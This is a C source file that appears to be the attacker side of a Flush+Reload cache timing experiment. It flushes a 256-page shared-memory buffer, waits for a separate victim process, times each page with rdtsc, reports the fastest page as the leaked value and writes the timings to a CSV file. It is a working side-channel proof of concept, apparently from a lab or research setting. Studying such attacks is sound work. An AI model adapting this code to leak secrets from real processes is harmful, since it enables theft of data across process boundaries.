#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/sysinfo.h>
#include <unistd.h>
#include <math.h>
#include <ctype.h>
#include <getopt.h>
#include <signal.h>
#include <string.h>
#include <time.h>
#include <x86intrin.h>

#define ASLR_SIZE 1
#define ARRAY_SIZE 8
//#define INDEX_BIT   // Number of index bits, as per the example
#define CACHE_LINE 64
#define PAGE_SIZE 4096
#define KERNEL 0x200000

//int result[256];

#define MEMACCESS(p)\
asm volatile ("movq (%0), %%rax\n"\
    "lfence\n"\
    :\
    : "c" (p)\
    : "rax")\

#define READ(p)\
asm volatile ("movq %%rax, (%0)\n"\
    :\
    : "c" (p)\
    : "rax")\

 void flush(void* p) {
    asm volatile ("clflush (%0)\n"
      :
      : "c" (p)
      : "rax");
  }

//const size_t memory_pool_size =  1024 * 1024 * 1024;
//int shuffle_range = memory_pool_size / PAGE_SIZE;
//int array_s[shuffle_range + 1];

//uint8_t probe[256 * PAGE_SIZE];

void flushAll(void* start, int backward, int forward){
    for(int i= backward; i< forward; i+=64){
      void * address = start + (i);
      flush(address);
    }
}


int main() {
    int start, end;
	const char *shm_name = "/my_shared_memory"; // Name of the shared memory object
    int shm_fd;
    size_t shm_size = 256 * PAGE_SIZE; // Size of the shared memory region (1 integer)

    // Open the shared memory object
    //shm_fd = shm_open(shm_name, O_RDWR, S_IRUSR | S_IWUSR);
    shm_fd = shm_open(shm_name, O_CREAT | O_RDWR, S_IRUSR | S_IWUSR);
    if (shm_fd == -1) {
        perror("shm_open");
        exit(EXIT_FAILURE);
    }
    

     if (ftruncate(shm_fd, shm_size) == -1) {
        perror("ftruncate");
        exit(EXIT_FAILURE);
    }
     

    //printf("!!\n");
    // Map the shared memory region
    uint8_t *shared_value = (uint8_t *)mmap(NULL, shm_size, PROT_WRITE | PROT_READ, MAP_SHARED, shm_fd, 0);

    if (shared_value == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }
    
    //printf("1\n");
    
    for (int i = 0; i < 256; i++) {
	 uint8_t *ptr_init = (uint8_t *)(shared_value + i * PAGE_SIZE);
    	*ptr_init = 0;
    }
    flushAll(shared_value, 0, 256 * PAGE_SIZE);
    //printf("1\n");

    // Read data from shared memory
    //printf("Data read from shared memory: %d\n", *shared_value);
    
    for (int i = 0; i < 1000000;i++) 
	    asm volatile("mfence");
    printf("Initilization Done. Please execute the victim on another terminal.\n");
    getchar(); 
    int endi[256];
    printf("sampling\n");
    for (int i = 0; i<256;i++) {
	    asm volatile("mfence");
    	    start = _rdtsc();
    	    asm volatile("mfence");
    	    MEMACCESS(shared_value + i * PAGE_SIZE);
    //MEMACCESS(&array_out[5 * 64]);
    //array_out[3 * 64]++;
    	    end = _rdtsc() - start;
    	    //endi[i] = end;
	    printf("");
	    endi[i] = end;
    }


     int temp = endi[0];
    int f_index = 0;
    for (int i = 1; i < 256; i++) {
            if(endi[i] < temp) {
                    f_index = i;
                    temp = endi[i];
            }
            if(endi[f_index] > 600)
                    f_index = 0;
    }

    printf("%d\n", f_index);

    char path[30];
    strcpy(path, "results/output.csv");
    FILE *fp = fopen(path, "w");
    if (fp == NULL) {
        fprintf(stderr, "fopen() failed.\n");
        exit(EXIT_FAILURE);
    }
    int sum = 0;

    for (int i = 0 ; i < 256; i++) {
         fprintf(fp, "%d,%d\n", i, endi[i]);
    }
    // Unmap and close the shared memory
    if (munmap(shared_value, shm_size) == -1) {
        perror("munmap");
        exit(EXIT_FAILURE);
    }

    if (close(shm_fd) == -1) {
        perror("close");
        exit(EXIT_FAILURE);
    }
    
    
    printf("Attack finished. Please terminate victim by pressing ENTER on its terminal.\n");

    return 0;
}





